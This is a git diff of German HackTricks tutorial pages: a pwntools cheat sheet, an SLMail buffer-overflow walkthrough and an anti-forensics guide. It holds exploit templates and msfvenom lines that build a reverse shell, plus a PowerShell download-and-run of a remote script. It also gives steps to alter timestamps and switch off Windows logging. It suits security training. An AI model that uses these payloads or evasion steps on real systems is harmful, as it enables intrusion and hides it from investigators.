-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositories senden.
+{% endhint %} ``` pip3 install pwntools ``` # Pwn asm -Holen Sie Opcodes von einer Zeile oder einer Datei. +Holen Sie Opcodes aus einer Zeile oder Datei. ``` pwn asm "jmp esp" pwn asm -i ``` **Kann auswählen:** -* Ausgabetyp (roh, hexadezimal, Zeichenkette, ELF) -* Ausgabedatei-Kontext (16, 32, 64, Linux, Windows...) -* Bytes vermeiden (Zeilenumbrüche, Null, eine Liste) -* Encoder für Debugging des Shellcodes auswählen und mit gdb die Ausgabe ausführen +* Ausgabetyp (roh, hexadezimal, Zeichenfolge, ELF) +* Ausgabedateikontext (16, 32, 64, Linux, Windows...) +* Bytes vermeiden (Zeilenumbrüche, Nullen, eine Liste) +* Encoder für Debug-Shellcode auswählen und mit gdb die Ausgabe ausführen -# **Pwn checksec** +# **Pwn Checksec** Checksec-Skript ``` @@ -36,53 +37,9 @@ pwn checksec ``` # Pwn constgrep -`constgrep` ist ein nützliches Werkzeug, um Konstanten in ausführbaren Dateien zu finden. Es kann verwendet werden, um nach bestimmten Werten in Speicheradressen zu suchen und diese zu extrahieren. - -## Verwendung - -Die Syntax für die Verwendung von `constgrep` lautet: - -```bash -constgrep -``` - -`` ist der Wert, nach dem gesucht werden soll, und `` ist die ausführbare Datei, in der gesucht werden soll. - -## Beispiel - -Angenommen, wir haben eine ausführbare Datei namens `program`, in der wir nach der Konstante `0xdeadbeef` suchen möchten. Wir können `constgrep` wie folgt verwenden: - -```bash -constgrep 0xdeadbeef program -``` - -Dies wird alle Vorkommen von `0xdeadbeef` in der Datei `program` finden und anzeigen. - # Pwn cyclic -Erzeugen eines Musters - -`cyclic` ist ein nützliches Werkzeug, um Muster zu generieren, die bei der Ausnutzung von Pufferüberläufen und ähnlichen Angriffen hilfreich sein können. Es erzeugt eine sich wiederholende Sequenz von Zeichen, die verwendet werden kann, um die Position von Speicherüberläufen zu ermitteln. - -## Verwendung - -Die Syntax für die Verwendung von `cyclic` lautet: - -```bash -cyclic -``` - -`` ist die Länge des zu generierenden Musters. - -## Beispiel - -Angenommen, wir möchten ein Muster mit einer Länge von 100 generieren. Wir können `cyclic` wie folgt verwenden: - -```bash -cyclic 100 -``` - -Dies erzeugt ein Muster mit einer Länge von 100 Zeichen, das zur Analyse von Pufferüberläufen verwendet werden kann. +Erstellen Sie ein Muster ``` pwn cyclic 3000 pwn cyclic -l faad @@ -91,12 +48,12 @@ pwn cyclic -l faad * Das verwendete Alphabet (Standardmäßig Kleinbuchstaben) * Länge des eindeutigen Musters (Standardmäßig 4) -* Kontext (16,32,64,linux,windows...) -* Offset übernehmen (-l) +* Kontext (16,32,64,Linux,Windows...) +* Den Offset angeben (-l) # Pwn Debug -GDB an einen Prozess anhängen +Füge GDB einem Prozess hinzu ``` pwn debug --exec /bin/bash pwn debug --pid 1234 @@ -105,12 +62,12 @@ pwn debug --process bash **Kann auswählen:** * Nach ausführbarer Datei, nach Namen oder nach PID-Kontext (16,32,64,linux,windows...) -* gdbscript zum Ausführen -* sysrootpath +* Auszuführendes gdbscript +* Sysrootpfad # Pwn disablenx -Deaktiviert NX für eine ausführbare Datei +Deaktiviert nx für eine Binärdatei ``` pwn disablenx ``` @@ -134,21 +91,21 @@ pwn elfdiff ``` # Pwn hex -Erhalte die hexadezimale Darstellung +Erhalten Sie die hexadezimale Darstellung ```bash pwn hex hola #Get hex of "hola" ascii ``` # Pwn phd -Holen Sie sich den Hexdump +Erhalte Hexdump ``` pwn phd ``` **Kann auswählen:** * Anzahl der anzuzeigenden Bytes -* Anzahl der Bytes pro Zeile, um Byte hervorzuheben -* Bytes am Anfang überspringen +* Anzahl der Bytes pro Zeile hervorheben +* Überspringe Bytes am Anfang # Pwn pwnstrip @@ -156,7 +113,7 @@ pwn phd # Pwn shellcraft -Shellcodes erhalten +Erhalte Shellcodes ``` pwn shellcraft -l #List shellcodes pwn shellcraft -l amd #Shellcode with amd in the name @@ -169,15 +126,15 @@ pwn shellcraft .r amd64.linux.bindsh 9095 #Bind SH to port * Shellcode und Argumente für den Shellcode * Ausgabedatei * Ausgabeformat -* Debuggen (dbg an Shellcode anhängen) -* Vorher (Debuggen-Falle vor dem Code) -* Nachher -* Vermeiden von Opcodes (Standard: nicht null und neue Zeile) -* Shellcode ausführen +* Debug (dbg an Shellcode anhängen) +* vor (Debug-Falle vor Code) +* nach +* Vermeiden Sie die Verwendung von Opcodes (Standard: nicht null und Zeilenumbruch) +* Führen Sie den Shellcode aus * Farbe/keine Farbe -* Liste der Systemaufrufe anzeigen -* Liste möglicher Shellcodes anzeigen -* ELF als gemeinsam genutzte Bibliothek generieren +* Liste der Systemaufrufe +* Liste möglicher Shellcodes +* Generiere ELF als Shared Library # Pwn-Vorlage @@ -185,7 +142,7 @@ Holen Sie sich eine Python-Vorlage ``` pwn template ``` -**Kann auswählen:** Host, Port, Benutzer, Passwort, Pfad und Quiet +**Kann auswählen:** Host, Port, Benutzer, Passwort, Pfad und leise # Pwn unhex @@ -193,22 +150,23 @@ Von Hexadezimal zu String ``` pwn unhex 686f6c61 ``` -# Pwn-Update +# Pwn Update -Um pwntools zu aktualisieren, führen Sie den folgenden Befehl aus: +Um pwntools zu aktualisieren ``` pwn update ``` +{% hint style="success" %} +Lernen Sie AWS-Hacking und üben Sie es:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie GCP-Hacking und üben Sie es: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositories senden.
+{% endhint %} diff --git a/exploiting/windows-exploiting-basic-guide-oscp-lvl.md b/exploiting/windows-exploiting-basic-guide-oscp-lvl.md index 89f7039d6..855943b8e 100644 --- a/exploiting/windows-exploiting-basic-guide-oscp-lvl.md +++ b/exploiting/windows-exploiting-basic-guide-oscp-lvl.md @@ -1,59 +1,31 @@ # Windows Exploiting (Grundlagen - OSCP lvl) +{% hint style="success" %} +Lernen Sie & üben Sie AWS-Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) **und** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **GitHub-Repositories senden.**
+{% endhint %} ## **Beginnen Sie mit der Installation des SLMail-Dienstes** ## SLMail-Dienst neu starten -Jedes Mal, wenn Sie den **SLMail-Dienst neu starten müssen**, können Sie dies über die Windows-Konsole tun: +Jedes Mal, wenn Sie den **Dienst SLMail neu starten** müssen, können Sie dies über die Windows-Konsole tun: ``` net start slmail ``` ![](<../.gitbook/assets/image (23) (1).png>) -## Sehr einfache Python-Exploit-Vorlage - -```python -#!/usr/bin/env python3 - -import socket - -# Set the target IP and port -target_ip = "192.168.1.100" -target_port = 1337 - -# Create a socket object -s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - -# Connect to the target -s.connect((target_ip, target_port)) - -# Send the payload -payload = b"AAAAAABBBBBBCCCCC" -s.send(payload) - -# Receive the response -response = s.recv(1024) -print(response.decode()) - -# Close the connection -s.close() -``` - -Dies ist eine sehr einfache Python-Exploit-Vorlage. Sie können sie verwenden, um eine Verbindung zu einem Ziel-IP-Adresse und Port herzustellen und dann einen Payload zu senden. Der Payload in diesem Beispiel ist "AAAAAABBBBBBCCCCC". Sie können den Payload an Ihre Bedürfnisse anpassen. Nach dem Senden des Payloads empfangen Sie die Antwort vom Ziel und schließen dann die Verbindung. +## Sehr einfaches Python-Exploit-Vorlagen ```python #!/usr/bin/python @@ -75,9 +47,9 @@ print "\nFinished!." except: print "Could not connect to "+ip+":"+port ``` -## **Ändern Sie die Schriftart des Immunity Debuggers** +## **Ändern der Schriftart des Immunity Debuggers** -Gehen Sie zu `Optionen >> Erscheinungsbild >> Schriftarten >> Ändern (Consolas, Fett, 9) >> OK` +Gehe zu `Options >> Appearance >> Fonts >> Ändern (Consolas, Fett, 9) >> OK` ## **Den Prozess an den Immunity Debugger anhängen:** @@ -85,25 +57,25 @@ Gehen Sie zu `Optionen >> Erscheinungsbild >> Schriftarten >> Ändern (Consolas, ![](<../.gitbook/assets/image (24) (1) (1).png>) -**Und drücken Sie die START-Taste** +**Und drücke die START-Taste** -## **Exploit senden und überprüfen, ob EIP betroffen ist:** +## **Das Exploit senden und überprüfen, ob EIP betroffen ist:** ![](<../.gitbook/assets/image (25) (1) (1).png>) -Jedes Mal, wenn Sie den Dienst unterbrechen, sollten Sie ihn neu starten, wie am Anfang dieser Seite angegeben. +Jedes Mal, wenn du den Dienst unterbrichst, solltest du ihn neu starten, wie am Anfang dieser Seite angegeben. -## Erstellen Sie ein Muster, um das EIP zu ändern +## Ein Muster erstellen, um das EIP zu ändern -Das Muster sollte so groß sein wie der Puffer, den Sie zuvor verwendet haben, um den Dienst zu unterbrechen. +Das Muster sollte so groß sein wie der Puffer, den du zuvor verwendet hast, um den Dienst zu unterbrechen. ![](<../.gitbook/assets/image (26) (1) (1).png>) ``` /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000 ``` -Ändern Sie den Puffer des Exploits und setzen Sie das Muster und starten Sie den Exploit. +Ändern Sie den Puffer des Exploits und setzen Sie das Muster, und starten Sie den Exploit. -Es sollte ein neuer Absturz auftreten, jedoch mit einer anderen EIP-Adresse: +Ein neuer Absturz sollte auftreten, jedoch mit einer anderen EIP-Adresse: ![](<../.gitbook/assets/image (27) (1) (1).png>) @@ -113,19 +85,19 @@ Es sollte ein neuer Absturz auftreten, jedoch mit einer anderen EIP-Adresse: ``` /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 39694438 ``` -Es sieht so aus, als könnten wir das EIP an Offset 2606 des Buffers ändern. +Sieht so aus, als ob **wir das EIP im Offset 2606 des Buffers ändern können**. Überprüfen Sie dies, indem Sie den Buffer des Exploits modifizieren: ``` buffer = 'A'*2606 + 'BBBB' + 'CCCC' ``` -Mit diesem Puffer sollte das EIP-Absturzziel auf 42424242 ("BBBB") zeigen. +Mit diesem Puffer sollte der abgestürzte EIP auf 42424242 ("BBBB") zeigen. ![](<../.gitbook/assets/image (30) (1) (1).png>) ![](<../.gitbook/assets/image (29) (1) (1).png>) -Es scheint zu funktionieren. +Sieht so aus, als ob es funktioniert. ## Überprüfen Sie den Shellcode-Speicherplatz im Stack @@ -135,13 +107,13 @@ Lassen Sie uns den Puffer ändern: ``` buffer = 'A'*2606 + 'BBBB' + 'C'*600 ``` -Starten Sie den neuen Exploit und überprüfen Sie den EBP und die Länge des nützlichen Shellcodes. +Starten Sie das neue Exploit und überprüfen Sie den EBP und die Länge des nützlichen Shellcodes ![](<../.gitbook/assets/image (31) (1).png>) ![](<../.gitbook/assets/image (32) (1).png>) -Sie können sehen, dass beim Erreichen der Schwachstelle der EBP auf den Shellcode zeigt und dass wir hier viel Platz haben, um einen Shellcode zu platzieren. +Sie können sehen, dass wenn die Schwachstelle erreicht ist, der EBP auf den Shellcode zeigt und dass wir viel Platz haben, um hier einen Shellcode zu platzieren. In diesem Fall haben wir **von 0x0209A128 bis 0x0209A2D6 = 430B.** Genug. @@ -171,11 +143,11 @@ buffer = 'A'*2606 + 'BBBB' + badchars ``` Die badchars beginnen bei 0x01, weil 0x00 fast immer schlecht ist. -Führen Sie den Exploit wiederholt mit diesem neuen Puffer aus und entfernen Sie die Zeichen, die als nutzlos erkannt werden: +Führen Sie den Exploit wiederholt mit diesem neuen Puffer aus, wobei die als nutzlos erkannten Zeichen gelöscht werden:. Zum Beispiel: -In diesem Fall können Sie sehen, dass **Sie das Zeichen 0x0A nicht verwenden sollten** (es wird nichts im Speicher gespeichert, da das Zeichen 0x09). +In diesem Fall können Sie sehen, dass **Sie das Zeichen 0x0A nicht verwenden sollten** (nichts wird im Speicher gespeichert, da das Zeichen 0x09). ![](<../.gitbook/assets/image (33) (1).png>) @@ -183,13 +155,13 @@ In diesem Fall können Sie sehen, dass **das Zeichen 0x0D vermieden wird**: ![](<../.gitbook/assets/image (34) (1).png>) -## Finden Sie eine JMP ESP als Rückgabeadresse +## Finden Sie eine JMP ESP als Rücksprungadresse -Verwenden: +Verwendung: ``` !mona modules #Get protections, look for all false except last one (Dll of SO) ``` -Sie werden die Speicherkarten auflisten. Suchen Sie nach einer DLL, die Folgendes aufweist: +Du wirst **die Speicherkarten auflisten**. Suche nach einer DLL, die folgende Eigenschaften hat: * **Rebase: False** * **SafeSEH: False** @@ -199,25 +171,25 @@ Sie werden die Speicherkarten auflisten. Suchen Sie nach einer DLL, die Folgende ![](<../.gitbook/assets/image (35) (1).png>) -Nun sollten Sie in diesem Speicher einige JMP ESP-Bytes finden. Führen Sie dazu Folgendes aus: +Nun solltest du innerhalb dieses Speichers einige JMP ESP-Bytes finden. Führe dazu aus: ``` !mona find -s "\xff\xe4" -m name_unsecure.dll # Search for opcodes insie dll space (JMP ESP) !mona find -s "\xff\xe4" -m slmfc.dll # Example in this case ``` -**Dann, wenn eine Adresse gefunden wird, wähle eine aus, die keine ungültigen Zeichen enthält:** +**Dann, wenn eine Adresse gefunden wird, wählen Sie eine aus, die keine badchar enthält:** ![](<../.gitbook/assets/image (36) (1).png>) -**In diesem Fall zum Beispiel: \_0x5f4a358f**\_ +**In diesem Fall, zum Beispiel: \_0x5f4a358f**\_ -## Erstelle Shellcode +## Erstellen von Shellcode ``` msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.41 LPORT=443 -f c -b '\x00\x0a\x0d' msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://10.11.0.41/nishang.ps1')\"" -f python -b '\x00\x0a\x0d' ``` -Wenn der Exploit nicht funktioniert, obwohl er es sollte (du kannst mit ImDebg sehen, dass der Shellcode erreicht wird), versuche andere Shellcodes zu erstellen (msfvenom erstellt verschiedene Shellcodes für dieselben Parameter). +Wenn der Exploit nicht funktioniert, obwohl er es sollte (Sie können mit ImDebg sehen, dass der Shellcode erreicht wird), versuchen Sie, andere Shellcodes zu erstellen (msfvenom erstellt verschiedene Shellcodes für dieselben Parameter). -**Füge einige NOPS am Anfang** des Shellcodes hinzu und verwende ihn zusammen mit der Rückkehradresse zu JMP ESP, um den Exploit abzuschließen: +**Fügen Sie einige NOPS am Anfang** des Shellcodes hinzu und verwenden Sie ihn und die Rücksprungadresse, um zu JMP ESP zu springen, und beenden Sie den Exploit: ```bash #!/usr/bin/python @@ -276,16 +248,17 @@ Fügen Sie diese Parameter hinzu: ``` EXITFUNC=thread -e x86/shikata_ga_nai ``` +{% hint style="success" %} +Lernen Sie AWS-Hacking und üben Sie:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie GCP-Hacking und üben Sie: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github Repositories einreichen.
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/anti-forensic-techniques.md b/forensics/basic-forensic-methodology/anti-forensic-techniques.md index ae39d9cd4..31aa24672 100644 --- a/forensics/basic-forensic-methodology/anti-forensic-techniques.md +++ b/forensics/basic-forensic-methodology/anti-forensic-techniques.md @@ -1,26 +1,26 @@ +{% hint style="success" %} +Lernen & üben Sie AWS-Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Erfahren Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks beworben sehen** möchten oder **HackTricks in PDF herunterladen** möchten, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegramm-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories einreichen. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories einreichen.
+{% endhint %}
{% embed url="https://websec.nl/" %} - # Zeitstempel -Ein Angreifer könnte daran interessiert sein, die **Zeitstempel von Dateien zu ändern**, um nicht entdeckt zu werden.\ -Es ist möglich, die Zeitstempel im MFT in den Attributen `$STANDARD_INFORMATION` __ und __ `$FILE_NAME` zu finden. +Ein Angreifer könnte daran interessiert sein, **die Zeitstempel von Dateien zu ändern**, um nicht entdeckt zu werden.\ +Es ist möglich, die Zeitstempel in den Attributen `$STANDARD_INFORMATION` __ und __ `$FILE_NAME` im MFT zu finden. Beide Attribute haben 4 Zeitstempel: **Änderung**, **Zugriff**, **Erstellung** und **MFT-Registrierungsänderung** (MACE oder MACB). @@ -28,7 +28,7 @@ Beide Attribute haben 4 Zeitstempel: **Änderung**, **Zugriff**, **Erstellung** ## TimeStomp - Anti-Forensik-Tool -Dieses Tool **ändert** die Zeitstempelinformationen innerhalb von **`$STANDARD_INFORMATION`** **aber** **nicht** die Informationen innerhalb von **`$FILE_NAME`**. Daher ist es möglich, **verdächtige Aktivitäten zu identifizieren**. +Dieses Tool **ändert** die Zeitstempelinformationen innerhalb von **`$STANDARD_INFORMATION`** **aber nicht** die Informationen innerhalb von **`$FILE_NAME`**. Daher ist es möglich, **verdächtige Aktivitäten zu identifizieren**. ## Usnjrnl @@ -36,7 +36,7 @@ Das **USN Journal** (Update Sequence Number Journal) ist eine Funktion des NTFS ![](<../../.gitbook/assets/image (449).png>) -Das vorherige Bild ist die **Ausgabe**, die vom **Tool** angezeigt wird, in der einige **Änderungen an der Datei durchgeführt wurden**. +Das vorherige Bild zeigt die **Ausgabe** des **Tools**, in dem zu erkennen ist, dass einige **Änderungen an der Datei vorgenommen wurden**. ## $LogFile @@ -44,9 +44,9 @@ Das vorherige Bild ist die **Ausgabe**, die vom **Tool** angezeigt wird, in der ![](<../../.gitbook/assets/image (450).png>) -Erneut ist es in der Ausgabe des Tools möglich zu sehen, dass **einige Änderungen durchgeführt wurden**. +Erneut ist es in der Ausgabe des Tools möglich zu sehen, dass **einige Änderungen vorgenommen wurden**. -Mit demselben Tool ist es möglich zu identifizieren, **zu welcher Zeit die Zeitstempel geändert wurden**: +Mit demselben Tool ist es möglich festzustellen, **zu welcher Zeit die Zeitstempel geändert wurden**: ![](<../../.gitbook/assets/image (451).png>) @@ -57,7 +57,7 @@ Mit demselben Tool ist es möglich zu identifizieren, **zu welcher Zeit die Zeit ## Vergleich von `$STANDARD_INFORMATION` und `$FILE_NAME` -Eine weitere Möglichkeit, verdächtig modifizierte Dateien zu identifizieren, wäre der Vergleich der Zeit in beiden Attributen auf der Suche nach **Unstimmigkeiten**. +Eine weitere Möglichkeit, verdächtig modifizierte Dateien zu identifizieren, wäre der Vergleich der Zeit in beiden Attributen auf der Suche nach **Abweichungen**. ## Nanosekunden @@ -65,17 +65,17 @@ Eine weitere Möglichkeit, verdächtig modifizierte Dateien zu identifizieren, w ## SetMace - Anti-Forensik-Tool -Dieses Tool kann beide Attribute `$STARNDAR_INFORMATION` und `$FILE_NAME` ändern. Ab Windows Vista ist es jedoch erforderlich, ein Live-Betriebssystem zu haben, um diese Informationen zu ändern. +Dieses Tool kann beide Attribute `$STARNDAR_INFORMATION` und `$FILE_NAME` ändern. Ab Windows Vista ist jedoch ein Live-Betriebssystem erforderlich, um diese Informationen zu ändern. # Datenversteckung -NFTS verwendet einen Cluster und die minimale Informationsgröße. Das bedeutet, dass, wenn eine Datei einen Cluster und eine Hälfte belegt, die **verbleibende Hälfte niemals verwendet wird**, bis die Datei gelöscht wird. Dann ist es möglich, **Daten in diesem Slack-Space zu verstecken**. +NFTS verwendet einen Cluster und die minimale Informationsgröße. Das bedeutet, dass, wenn eine Datei einen Cluster und eine Hälfte belegt, die **verbleibende Hälfte nie verwendet wird**, bis die Datei gelöscht wird. Daher ist es möglich, Daten in diesem Slack-Speicher zu **verstecken**. -Es gibt Tools wie Slacker, die das Verstecken von Daten in diesem "versteckten" Speicherplatz ermöglichen. Eine Analyse des `$logfile` und `$usnjrnl` kann jedoch zeigen, dass Daten hinzugefügt wurden: +Es gibt Tools wie Slacker, die das Verstecken von Daten in diesem "versteckten" Speicher ermöglichen. Eine Analyse des `$logfile` und `$usnjrnl` kann jedoch zeigen, dass Daten hinzugefügt wurden: ![](<../../.gitbook/assets/image (452).png>) -Dann ist es möglich, den Slack-Space mithilfe von Tools wie FTK Imager wiederherzustellen. Beachten Sie, dass diese Art von Tool den Inhalt verschleiert oder sogar verschlüsselt speichern kann. +Daher ist es möglich, den Slack-Speicher mithilfe von Tools wie FTK Imager wiederherzustellen. Beachten Sie, dass diese Art von Tool den Inhalt verschleiert oder sogar verschlüsselt speichern kann. # UsbKill @@ -98,7 +98,7 @@ Es ist möglich, mehrere Windows-Protokollierungsmethoden zu deaktivieren, um di Dies ist ein Registrierungsschlüssel, der Datum und Uhrzeit speichert, wann jede ausführbare Datei vom Benutzer ausgeführt wurde. -Das Deaktivieren von UserAssist erfordert zwei Schritte: +Die Deaktivierung von UserAssist erfordert zwei Schritte: 1. Setzen Sie zwei Registrierungsschlüssel, `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs` und `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackEnabled`, beide auf Null, um anzuzeigen, dass wir UserAssist deaktivieren möchten. 2. Löschen Sie Ihre Registrierungsunterbäume, die wie `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\` aussehen. @@ -115,7 +115,7 @@ Dies speichert Informationen über die ausgeführten Anwendungen mit dem Ziel, d ## Deaktivieren von Zeitstempeln - Letzter Zugriffszeitpunkt -Immer wenn ein Ordner von einem NTFS-Volume auf einem Windows NT-Server geöffnet wird, nimmt sich das System Zeit, um **ein Zeitstempelfeld in jedem aufgelisteten Ordner zu aktualisieren**, genannt der letzte Zugriffszeitpunkt. Auf einem stark genutzten 